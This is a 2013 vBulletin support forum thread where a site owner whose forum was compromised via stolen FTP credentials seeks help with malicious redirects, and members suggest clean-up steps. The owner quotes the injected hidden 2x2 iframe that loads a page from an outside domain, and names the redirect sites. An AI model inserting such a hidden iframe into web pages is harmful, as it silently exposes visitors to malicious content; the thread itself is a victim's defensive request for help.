Register Members List Search Today's Posts Mark Forums Read

Reply
 
Thread Tools
  #1  
Old 02 Jan 2013, 10:55
Traxdata Traxdata is offline
 
Join Date: Jul 2004
Angry Forum hacked

My forum was hacked for the first time ever -
buttons and images are not showing,
if I click on links in forums they redirect me to http://breakthrufundraising . com/ezzi.html this site,
have deleted all index.html files on server, all changed files rewrote to originals.
still nothing. any idea???

PS: Can't login to admincp since if I enter my PW my forum redirects me to the above mentioned website. Nothing can be changed.
I have closed forums via .htaccess

Thanks!

Last edited by Traxdata; 02 Jan 2013 at 14:17.
Reply With Quote
  #2  
Old 02 Jan 2013, 11:00
ForceHSS's Avatar
ForceHSS ForceHSS is offline
 
Join Date: Apr 2008
link to site?
Reply With Quote
  #3  
Old 02 Jan 2013, 11:05
Traxdata Traxdata is offline
 
Join Date: Jul 2004
like mentioned I have closed the boards via .htaccess to protect that user pw's (if they login) will be forward.
Reply With Quote
  #4  
Old 02 Jan 2013, 13:43
ForceHSS's Avatar
ForceHSS ForceHSS is offline
 
Join Date: Apr 2008
so without a link to your site that would help someone to find out what has been installed how are we to help you fix this problem. As all you have here is a post telling us you have a problem but no way for us to help you
Reply With Quote
  #5  
Old 02 Jan 2013, 13:44
Brandon Sheley's Avatar
Brandon Sheley Brandon Sheley is offline
 
Join Date: Mar 2005
Real name: Brandon
Why did you give us a live link to the guy "hacking" you?
Can you show us a screenshot of your images and buttons not showing, as you said?
Have you checked the server logs, I'd suggest changing your database info and finding out how you where compromised.
__________________

Email me for website help: brandon[at]sheley[dot]org
Reply With Quote
  #6  
Old 02 Jan 2013, 14:04
In Omnibus's Avatar
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Real name: Kris
Without a link to the site in need of assistance this is more like a spam thread for the link that has been posted.
Reply With Quote
  #7  
Old 02 Jan 2013, 14:13
doctorsexy's Avatar
doctorsexy doctorsexy is offline
 
Join Date: Apr 2011
Real name: Chris
Watch that link. as it trys to load something..
__________________
http://sandstormradio.org
Reply With Quote
  #8  
Old 02 Jan 2013, 14:16
Traxdata Traxdata is offline
 
Join Date: Jul 2004
I have two sites, check this one

- when you click on links you will be redirected to another (above mentioned) website. if you click "show image" you will also be redirected tio another website, I talked with my hoster they said someone had my FTP pw's
ok, I have replaced all files on darkshine.de but still not a big change!

--------------- Added 02 Jan 2013 at 14:17 ---------------

changed the link

--------------- Added 02 Jan 2013 at 14:18 ---------------

Originally Posted by doctorsexy View Post
Watch that link. as it trys to load something..
changed the link

--------------- Added 02 Jan 2013 at 14:25 ---------------

They added to all my .html files this:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo . com/hzws.html>;</iframe>
Have deleted all the files and replaced with new files - not helped!

Searched for
%base64% %iframe%
in phpmyadmin

nothing suspicious found.

--------------- Added 02 Jan 2013 at 14:28 ---------------

All the pictures from my server are not showing up neither on my sites nor on other places I have posted them!
Only if I click on "copy address for image" and paste in url bar I can see them.

Last edited by Traxdata; 02 Jan 2013 at 17:05.
Reply With Quote
  #9  
Old 02 Jan 2013, 14:40
Simon Lloyd's Avatar
Simon Lloyd Simon Lloyd is offline
 
Join Date: Aug 2008
Real name: Simon
My antivirus wouldn't allow your site to load!
__________________
Kind regards,
Simon Microsoft Office Help
My Mods: Find my modifications here
Please do not pm me for support unless i have invited you to!
Reply With Quote
  #10  
Old 02 Jan 2013, 14:46
Traxdata Traxdata is offline
 
Join Date: Jul 2004
Yes, a big help, thx!
Reply With Quote
  #11  
Old 02 Jan 2013, 14:49
In Omnibus's Avatar
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Real name: Kris
Are you able to login to the AdminCP directly using admincp/index.php?
Reply With Quote
  #12  
Old 02 Jan 2013, 14:52
Traxdata Traxdata is offline
 
Join Date: Jul 2004
no way,
since I have to enter my pw and when I click on continue...redirecting to this stupid website.

have access only with ftp, phpmyadmin or ssh

Like I said, my other website is not a forum, so no database, has nbothng to do with vbulletin, only .html and .jpg files.
I have replaced ALL .html files and some .jpg but still cant see the pictures and still redirecting active, talked to hoster - nothing suspicious (malware/trojaner) found on server.

Last edited by Traxdata; 02 Jan 2013 at 14:58.
Reply With Quote
  #13  
Old 02 Jan 2013, 14:55
In Omnibus's Avatar
In Omnibus In Omnibus is offline
 
Join Date: Apr 2010
Real name: Kris
Are you able to access the AdminCP using tools.php?

--------------- Added 02 Jan 2013 at 14:56 ---------------

The first thing I would do is to replace the index.php file with the default file. You should be able to do that much via FTP.
Reply With Quote
  #14  
Old 02 Jan 2013, 14:57
Traxdata Traxdata is offline
 
Join Date: Jul 2004
never tried, do I have to login on tools.php? if so, then no way.

--------------- Added 02 Jan 2013 at 15:11 ---------------

no way, it asks for member# and redirects to another website,
Reply With Quote
  #15  
Old 02 Jan 2013, 15:41
Simon Lloyd's Avatar
Simon Lloyd Simon Lloyd is offline
 
Join Date: Aug 2008
Real name: Simon
It seems to me that one or more of your core files hasn't been overwritten, you will also have a file or two which doesn't belong in your forum root which is rewriting the infection every time it doesn't see it, my suggestion would be to rename your forum folder add a new folder then name it to what your forum folder was, upload all fresh files (with the install/install.php deleted and the config.php.new edited for your database and renamed to config.php) and then try to access, if you can then you need to search your old folder for files that shouldn't be there, delete them, then upload with overwrite via ftp in ascii mode your fresh files in to the renamed folder, rename the temp folder to something else and then rename your old folder back to it's original and see how you go.
__________________
Kind regards,
Simon Microsoft Office Help
My Mods: Find my modifications here
Please do not pm me for support unless i have invited you to!
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


New To Site? Need Help?

All times are GMT. The time now is 14:25.

Layout Options | Width: Wide Color: